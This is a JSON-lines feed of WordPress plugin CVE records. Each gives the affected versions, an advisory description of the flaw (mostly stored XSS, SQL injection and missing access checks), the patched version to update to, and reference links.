{"CVE_ID":"CVE-2025-7496","slug":"woo-smart-compare","versionImpact":"6.4.7","versionEndExcluding":"6.4.8","description":"The WPC Smart Compare for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via DOM elements in all versions up to, and including, 6.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340004%40woo-smart-compare&new=3340004%40woo-smart-compare&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340004%40woo-smart-compare&new=3340004%40woo-smart-compare&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c01f7892-5ca2-4bc8-91c2-dfebb685aff8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c01f7892-5ca2-4bc8-91c2-dfebb685aff8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3492","slug":"events-manager","versionImpact":"6.4.7.3","versionEndExcluding":"6.4.8","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'event', 'location', and 'event_category' shortcodes in all versions up to, and including, 6.4.7.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a767f65e-bc7d-4576-af78-b77bd23dc089?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a767f65e-bc7d-4576-af78-b77bd23dc089?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101326\\\/events-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101326\\\/events-manager\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9838","slug":"wp-auto-affiliate-links","versionImpact":"6.4.6","versionEndExcluding":"6.4.7","description":"The Auto Affiliate Links WordPress plugin before 6.4.7 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 6.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cc0ff78-b310-40a4-899c-15fecbb345c5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cc0ff78-b310-40a4-899c-15fecbb345c5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5530","slug":"woo-smart-compare","versionImpact":"6.4.6","versionEndExcluding":"6.4.7","description":"The WPC Smart Compare for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shortcode_btn' shortcode in all versions up to, and including, 6.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-smart-compare\\\/tags\\\/6.4.5\\\/wpc-smart-compare.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-smart-compare\\\/tags\\\/6.4.5\\\/wpc-smart-compare.php#L187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-smart-compare\\\/tags\\\/6.4.5\\\/wpc-smart-compare.php#L2616\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-smart-compare\\\/tags\\\/6.4.5\\\/wpc-smart-compare.php#L2616\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3318565%40woo-smart-compare&new=3318565%40woo-smart-compare&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3318565%40woo-smart-compare&new=3318565%40woo-smart-compare&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bd09891-8117-43b1-8744-8f3773971540?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bd09891-8117-43b1-8744-8f3773971540?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9873","slug":"peepso-core","versionImpact":"6.4.6.1","versionEndExcluding":"6.4.6.2","description":"The Community by PeepSo \u2013 Social Network, Membership, Registration, User Profiles, Premium \u2013 Mobile App plugin for WordPress is vulnerable to Stored Cross-Site Scripting via URLs in posts, comments, and profiles when Markdown support is enabled in all versions up to, and including, 6.4.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33585791-be40-438c-bebc-8852e7cf8ae5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33585791-be40-438c-bebc-8852e7cf8ae5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168989\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/peepso.php?old=3157925&old_path=peepso-core%2Ftags%2F6.4.6.1%2Fpeepso.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168989\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/peepso.php?old=3157925&old_path=peepso-core%2Ftags%2F6.4.6.1%2Fpeepso.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8988","slug":"peepso-files","versionImpact":"6.4.6.0","versionEndExcluding":"6.4.6.1","description":"The PeepSo Core: File Uploads plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.4.6.0 via the file_download REST API endpoint due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to download files uploaded by other users and expose potentially sensitive information.","recommendation":"Update to version 6.4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3184996-655c-41d5-a3c5-6b36fbff58dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3184996-655c-41d5-a3c5-6b36fbff58dc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9017","slug":"peepso-groups","versionImpact":"6.4.6.0","versionEndExcluding":"6.4.6.1","description":"The PeepSo Core: Groups plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Group Description field in all versions up to, and including, 6.4.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32ac79f4-ada7-4c14-8675-53f8375912d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32ac79f4-ada7-4c14-8675-53f8375912d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5970","slug":"maxgalleria","versionImpact":"6.4.4","versionEndExcluding":"6.4.5","description":"The MaxGalleria plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's maxgallery_thumb shortcode in all versions up to, and including, 6.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0bb1036-3e45-4ac9-b920-3b9629a3a724?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0bb1036-3e45-4ac9-b920-3b9629a3a724?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxgalleria\\\/tags\\\/6.4.4\\\/maxgalleria-shortcode-thumb.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxgalleria\\\/tags\\\/6.4.4\\\/maxgalleria-shortcode-thumb.php#L45\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5527","slug":"business-directory-plugin","versionImpact":"6.4.3","versionEndExcluding":"6.4.4","description":"The Business Directory Plugin plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 6.4.3 via the class-csv-exporter.php file. This allows authenticated attackers, with author-level permissions and above, to embed untrusted input into CSV files exported by administrators, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.","recommendation":"Update to version 6.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed037e94-68b4-4efc-9d1a-fffc4aff1c45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed037e94-68b4-4efc-9d1a-fffc4aff1c45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/class-csv-exporter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/class-csv-exporter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/helpers\\\/csv\\\/class-csv-exporter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/helpers\\\/csv\\\/class-csv-exporter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102475\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/helpers\\\/csv\\\/class-csv-exporter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102475\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/helpers\\\/csv\\\/class-csv-exporter.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3581","slug":"maxgalleria","versionImpact":"6.4.2","versionEndExcluding":"6.4.3","description":"The MaxGalleria plugin for WordPress is vulnerable to unauthorized image upload due to a missing capability check on the add_media_library_images_to_gallery function in all versions up to, and including, 6.4.2. This makes it possible for authenticated attackers, with subscriber access or above, to upload arbitrary images to a gallery.","recommendation":"Update to version 6.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0629798c-ede2-43ac-9ec4-2cd99cd34ae2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0629798c-ede2-43ac-9ec4-2cd99cd34ae2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxgalleria\\\/trunk\\\/maxgalleria-image-gallery.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxgalleria\\\/trunk\\\/maxgalleria-image-gallery.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070919%40maxgalleria%2Ftrunk&old=3059014%40maxgalleria%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070919%40maxgalleria%2Ftrunk&old=3059014%40maxgalleria%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4443","slug":"business-directory-plugin","versionImpact":"6.4.2","versionEndExcluding":"6.4.3","description":"The Business Directory Plugin \u2013 Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018listingfields\u2019 parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 6.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/982fb304-08d6-4195-97a3-f18e94295492?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/982fb304-08d6-4195-97a3-f18e94295492?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/fields\\\/class-fieldtypes-select.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/fields\\\/class-fieldtypes-select.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089626\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089626\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-54940","slug":"advanced-custom-fields","versionImpact":"6.4.2","versionEndExcluding":"6.4.3","description":"An HTML injection vulnerability exists in WordPress plugin \"Advanced Custom Fields\" prior to 6.4.3. If this vulnerability is exploited, crafted HTML code may be rendered and page display may be tampered.","recommendation":"Update to version 6.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN21048820\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN21048820\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.advancedcustomfields.com\\\/blog\\\/acf-6-4-3-security-release\\\/\",\"name\":\"https:\\\/\\\/www.advancedcustomfields.com\\\/blog\\\/acf-6-4-3-security-release\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2571","slug":"quiz-maker","versionEndExcluding":"6.4.2.7","description":"The Quiz Maker WordPress plugin before 6.4.2.7 does not escape some parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2dc02e5c-1c89-4053-a6a7-29ee7b996183\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2dc02e5c-1c89-4053-a6a7-29ee7b996183\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28788","slug":"advanced-page-visit-counter","versionEndExcluding":"6.4.2.1","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Page Visit Counter Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress. This issue affects Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress: from n\/a through 6.4.2.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-6-4-2-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-6-4-2-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13207","slug":"facebook-pagelike-widget","versionImpact":"6.4.1","versionEndExcluding":"6.4.2","description":"The Widget for Social Page Feeds WordPress plugin before 6.4.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 6.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3e27fa2-b6dd-48eb-83ec-99dc034eff38\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3e27fa2-b6dd-48eb-83ec-99dc034eff38\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1069","slug":"complianz-gdpr","versionEndExcluding":"6.4.2","description":"The Complianz WordPress plugin before 6.4.2 and the Complianz Premium WordPress plugin before 6.4.2 do not validate and escape some of their shortcode attributes before outputting them back in the page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/caacc50c-822e-46e9-bc0b-681349fd0dda\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/caacc50c-822e-46e9-bc0b-681349fd0dda\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13887","slug":"business-directory-plugin","versionImpact":"6.4.14","versionEndExcluding":"6.4.15","description":"The Business Directory Plugin \u2013 Easy Listing Directories for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.4.14 via the 'ajax_listing_submit_image_upload' function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to add arbitrary images to listings.","recommendation":"Update to version 6.4.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249927\\\/business-directory-plugin\\\/trunk\\\/includes\\\/class-wpbdp.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249927\\\/business-directory-plugin\\\/trunk\\\/includes\\\/class-wpbdp.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06c3de6d-92e7-46f8-86a9-37f027767fc0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06c3de6d-92e7-46f8-86a9-37f027767fc0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0427","slug":"UNKNOWN-CVE-2024-4620-1","versionImpact":"6.4.0","versionEndExcluding":"6.4.1","description":"The ARForms - Premium WordPress Form Builder Plugin WordPress plugin before 6.4.1 does not properly escape user-controlled input when it is reflected in some of its AJAX actions.","recommendation":"Update to version 6.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1806fef3-d774-46e0-aa48-7a101495f4eb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1806fef3-d774-46e0-aa48-7a101495f4eb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4180","slug":"the-events-calendar","versionImpact":"6.4.0","versionEndExcluding":"6.4.0.1","description":"The Events Calendar WordPress plugin before 6.4.0.1 does not properly sanitize user-submitted content when rendering some views via AJAX.","recommendation":"Update to version 6.4.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2a92316-e404-4a5e-8426-f88df6e87550\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2a92316-e404-4a5e-8426-f88df6e87550\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4474","slug":"easy-facebook-likebox","versionEndExcluding":"6.4.0","description":"The Easy Social Feed WordPress plugin before 6.4.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3acc6940-13ec-40fb-8471-6b2f0445c543\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3acc6940-13ec-40fb-8471-6b2f0445c543\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2075","slug":"uncanny-automator","versionImpact":"6.3.0.2","versionEndExcluding":"6.4.0","description":"The Uncanny Automator \u2013 Easy Automation, Integration, Webhooks & Workflow Builder Plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.3.0.2. This is due to add_role() and user_role() functions missing proper capability checks performed through the validate_rest_call() function. This makes it possible for unauthenticated attackers to set the role of arbitrary users to administrator granting full access to the site, though privilege escalation requires an active account on the site so this is considered an authenticated privilege escalation.","recommendation":"Update to version 6.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257300\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/classes\\\/class-background-actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257300\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/classes\\\/class-background-actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3265280\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/classes\\\/class-background-actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3265280\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/classes\\\/class-background-actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b4b0d6-bda2-47f3-a0b5-9733cb7a11f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b4b0d6-bda2-47f3-a0b5-9733cb7a11f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4458","slug":"modern-events-calendar-lite","versionImpact":"6.3.0","versionEndExcluding":"6.4.0","description":"The Modern Events Calendar Lite plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the 'wp_ajax_mec_load_single_page' AJAX action in all versions up to, and including, 6.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is only exploitable on sites with addslashes disabled.","recommendation":"Update to version 6.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2683727\\\/modern-events-calendar-lite\\\/trunk\\\/app\\\/libraries\\\/render.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2683727\\\/modern-events-calendar-lite\\\/trunk\\\/app\\\/libraries\\\/render.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/703ba736-5834-40f2-9cf6-a6a70a73e4d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/703ba736-5834-40f2-9cf6-a6a70a73e4d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3821","slug":"wpdatatables","versionImpact":"6.3.2","versionEndExcluding":"6.4","description":"The wpDataTables \u2013 WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions in the wdt_ajax_actions.php file in all versions up to, and including, 6.3.2. This makes it possible for unauthenticated attackers to manipulate data tables. Please note this only affects the premium version of the plugin.","recommendation":"Update to version 6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d32215b5-9ecb-4feb-b76f-18821184dd8b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d32215b5-9ecb-4feb-b76f-18821184dd8b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpdatatables.com\\\/help\\\/whats-new-changelog\\\/\",\"name\":\"https:\\\/\\\/wpdatatables.com\\\/help\\\/whats-new-changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0973","slug":"facebook-pagelike-widget","versionImpact":"6.3","versionEndExcluding":"6.4","description":"The Widget for Social Page Feeds WordPress plugin before 6.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/798de421-4814-46a9-a055-ebb95a7218ed\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/798de421-4814-46a9-a055-ebb95a7218ed\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45607","slug":"wordpress-popular-posts","versionEndExcluding":"6.3.3","description":"Authenticated (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Hector Cabrera's WordPress Popular Posts plugin, versions <= 6.3.2.","recommendation":"Update to version 6.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-popular-posts\\\/wordpress-popular-posts-plugin-6-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-popular-posts\\\/wordpress-popular-posts-plugin-6-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13567","slug":"awesome-support","versionImpact":"6.3.1","versionEndExcluding":"6.3.2","description":"The Awesome Support \u2013 WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.3.1 via the 'awesome-support' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/awesome-support directory which can contain file attachments included in support tickets. The vulnerability was partially patched in version 6.3.1.","recommendation":"Update to version 6.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/file-uploader\\\/class-file-uploader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/file-uploader\\\/class-file-uploader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250497\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250497\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262629\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262629\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24c54ef5-ad02-4767-bca6-f74c539d3068?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24c54ef5-ad02-4767-bca6-f74c539d3068?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
